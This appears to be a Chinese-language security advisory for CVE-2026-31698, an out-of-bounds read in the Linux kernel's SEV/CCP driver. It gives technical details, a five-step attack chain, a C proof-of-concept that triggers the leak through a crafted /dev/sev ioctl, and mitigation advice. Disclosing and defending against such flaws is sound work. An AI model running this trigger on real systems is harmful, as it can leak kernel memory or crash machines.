CVE-2026-31698 CVSS 7.1 高危

CVE-2026-31698: Linux Kernel CCP驱动越界读取漏洞

披露日期: 2026-05-01

来源: 416baaa9-dc9f-4396-8d5f-8c081fb06d67

漏洞信息

漏洞编号

CVE-2026-31698

漏洞类型

越界读取

CVSS评分

7.1 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel

漏洞概述

Linux内核中的CCP驱动在处理PDH证书导出时存在安全漏洞。当PSP命令失败（例如用户空间缓冲区长度不足）时，驱动程序仍尝试将固件要求的数据量复制到用户空间。这会导致内核分配的缓冲区发生越界读取（slab-out-of-bounds），进而造成敏感内核信息泄露或系统崩溃。

技术细节

该漏洞位于`drivers/crypto/ccp/sev-dev.c`文件的`sev_ioctl_do_pdh_export`函数中。在通过IOCTL检索PDH证书时，如果固件命令返回错误（如因用户提供的缓冲区太小导致的无效长度），代码逻辑未能正确终止流程。驱动程序忽略了错误状态，继续调用`copy_to_user`，且使用了固件要求的长度参数而非用户分配的缓冲区长度。由于此长度通常大于内核分配的临时缓冲区大小，导致了越界读取。KASAN报告显示读取操作溢出了内核slab对象，攻击者可利用此漏洞从内核内存中读取敏感数据。

攻击链分析

STEP 1

步骤1

攻击者获取本地低权限访问权限，能够打开/dev/sev设备文件。

STEP 2

步骤2

攻击者构造恶意的IOCTL请求，设置PDH证书导出所需的缓冲区长度为极小值（如1字节）。

STEP 3

步骤3

内核驱动接收请求，调用固件命令。固件检测到长度不足并返回错误。

STEP 4

步骤4

驱动程序未正确处理错误，仍尝试按固件要求的长度从内核缓冲区复制数据到用户空间。

STEP 5

步骤5

触发越界读取，导致内核内存数据泄露给用户空间进程。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/*
 * PoC for CVE-2026-31698
 * Trigger out-of-bounds read in sev_ioctl_do_pdh_export
 * Compile: gcc -o poc_cve2026_31698 poc_cve2026_31698.c
 */
#include <stdio.h>
#include <stdlib.h>
#include <fcntl.h>
#include <unistd.h>
#include <sys/ioctl.h>
#include <string.h>

#define SEV_ISSUE_CMD _IOWR('S', 0x01, struct sev_issue_cmd)
#define SEV_PDH_CERT_EXPORT 0x09

struct sev_user_data_pdh_cert_export {
    __u64 pdh_cert_address;
    __u32 pdh_cert_len;
    __u32 cert_chain_address;
    __u32 cert_chain_len;
};

struct sev_issue_cmd {
    __u32 cmd;
    __u64 data;
    __u32 error;
};

int main() {
    int fd = open("/dev/sev", O_RDWR);
    if (fd < 0) {
        perror("Failed to open /dev/sev");
        return -1;
    }

    struct sev_user_data_pdh_cert_export data;
    memset(&data, 0, sizeof(data));
    
    // Set a very small length to trigger the firmware failure
    // and the subsequent OOB read in the driver
    data.pdh_cert_len = 1;

    struct sev_issue_cmd cmd;
    cmd.cmd = SEV_PDH_CERT_EXPORT;
    cmd.data = (__u64)&data;
    cmd.error = 0;

    printf("Triggering CVE-2026-31698...\n");
    if (ioctl(fd, SEV_ISSUE_CMD, &cmd) < 0) {
        perror(" IOCTL failed");
    } else {
        printf("IOCTL returned. Check dmesg for KASAN reports.\n");
    }

    close(fd);
    return 0;
}

影响范围

Linux Kernel (修复前版本)

防御指南

临时缓解措施

建议立即应用官方发布的内核补丁。在无法立即升级内核的情况下，可通过chmod或acl限制普通用户对/dev/sev设备的访问权限，从而降低被利用的风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表